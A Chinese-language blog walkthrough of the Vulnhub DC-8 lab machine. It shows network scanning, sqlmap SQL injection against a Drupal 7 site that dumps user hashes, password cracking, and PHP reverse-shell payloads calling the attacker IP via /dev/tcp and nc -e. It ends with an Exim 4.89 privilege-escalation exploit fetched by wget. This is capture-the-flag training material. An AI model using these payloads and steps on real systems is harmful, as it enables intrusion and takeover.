Vulnhub-DC-8 靶机复现完整过程

  • 开发
  • 39

一、环境搭建

kali的IP地址:192.168.200.14
DC-8的IP地址:192.168.200.13(一个flag)

靶机和攻击机处于同一个网络方式:nat或桥接
若出现开机错误,适当将dc的兼容版本改低,我的vmware workstation是17改成16.x就可以兼容

二、信息收集

1、扫描同网段存活主机

第一种方式:

arp-scan -l

image.png
第二种方式:

netdiscover -r 192.168.200.0/24

image.png

2、开放端口探测

nmap -sV -p-  192.168.200.13

image.png
开放端口有两个:22(SSH服务默认端口)和80(http默认端口)

3.目录扫描

image.png
image.png
image.png
查看robots。txt文件
image.png
这些禁止爬取的文件基本上都访问不了

三,漏洞探测

访问web页面
image.png
和DC-7一样的CMS(Drupal),DC-7的版本是8的,这个DC-8的版本是7的
不过页面中存在这样的三个不同的URL:
http://192.168.200.13/?nid=1
http://192.168.200.13/?nid=2
http://192.168.200.13/?nid=3
可能存在文件包含和SQL注入的漏洞
image.png

SQLMAP

1、扫描数据库

 sqlmap -u "http://192.168.200.13/?nid=1" --dbs --batch

image.png

2、查询数据表名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db --tables --batch

image.png

3、查询字段名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users --columns --batch

image.png

4、查询字段值

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users -C name,pass --dump

image.png
账号:admin
密码: S S SD2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

账号:john
密码: S S SDqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

四。漏洞利用

1.爆破密码密文

Drupal的hash密文是经过特殊加密的,用john进行爆破,先保存到password.txt文件中

vim  password.txt

image.png

image.png

爆破出来密文:turtle
试试 能不能直接账号对 DC-8 进行ssh登录,没成功,只能想办法获取webshell了
image.png

2.反弹shell

先用获得的密码:turtle登录,试试登录后台,应该是john的密码
image.png

登录成功!
image.png

还是运用上一靶场的方法,找一找能上传一句话木马的php文件
连不上。然后显示phpinfo的地址死活没反应
直接获取shell

PHP反弹 shell(Post 请求发送命令)

<?php system("bash -i > /dev/tcp/192.168.200.14/8899 0>&1");?>    #交互式shell

<?php system("bash -c 'sh -i &>/dev/tcp/192.168.200.14/8899 0>&1'");?>  #交互式shell

<?php
exec("nc -e /bin/bash 192.168.200.14 8899");
?>

将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码
image.png
image.png
成功反弹shell
image.png

3.提权

查一下suid权限的二进制文件

find / -perm -4000 -print 2>/dev/null

image.png
查询Exim 版本为4.89
image.png

利用kali搜索EXP
image.png

不破坏原有结构,复制一份新的命名为shell.sh(到kali端的桌面)

cp /usr/share/exploitdb/exploits/linux/local/46996.sh shell.sh

开启http服务

python -m http.server 8899

注:交互页面,方便后续操作

python -c 'import pty;pty.spawn("/bin/bash")'

在DC-7中下载该文件

wget  //192.168.200.57:8888/shell.sh

image.png
文件权限是无执行权限的,赋予执行权限

chmod 777 shell.sh

image.png
赋予可执行权限
image.png
接着根据sh脚本提示,执行文件

./shell.sh

不过奇怪的是,执行完之后还是普通权限
image.png
查看脚本的使用规则,又两个参数可用
image.png
将两个规则分别运行,第一个规则在运行之后无效;第二个规则成功运行,等待几秒之后,输入whoami可以看到提权成功
image.png
近到root目录,查看最终flag内容
image.png

文章参考出处:https://blog.csdn.net/weixin_45744814/article/details/120113301

阅读全部

相关推荐

最近更新

  4. TCP协议是安全的吗?

    2023-12-15 07:10:03       16 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2023-12-15 07:10:03       16 阅读

  13. 【Python教程】压缩PDF文件大小

    2023-12-15 07:10:03       15 阅读

  18. 通过文章id递归查询所有评论(xml)

    2023-12-15 07:10:03       18 阅读

热门阅读

  7. 已知某个脚本在运行,查找并打印它对应的所有进程的详细信息并kill

    2023-12-15 07:10:03       35 阅读

  9. 用python写一段收到邮件会在桌面弹出提醒

    2023-12-15 07:10:03       32 阅读

  12. android从ftp,阿里云,腾讯云下载zip

    2023-12-15 07:10:03       46 阅读

  13. Android RecyclerView 动画处理 流程 原理(源码分析第二篇)

    2023-12-15 07:10:03       33 阅读

  16. 单元测试二(理论)-云计算2023.12-云南农业大学

    2023-12-15 07:10:03       28 阅读

  21. 阶段五:深度学习和人工智能(学习人工智能的应用领域,如自然语言处理,计算机视觉等)

    2023-12-15 07:10:03       36 阅读

  29. Kubernetes权威指南:从Docker到Kubernetes实践全接触(第5版)读书笔记 第三章

    2023-12-15 07:10:03       33 阅读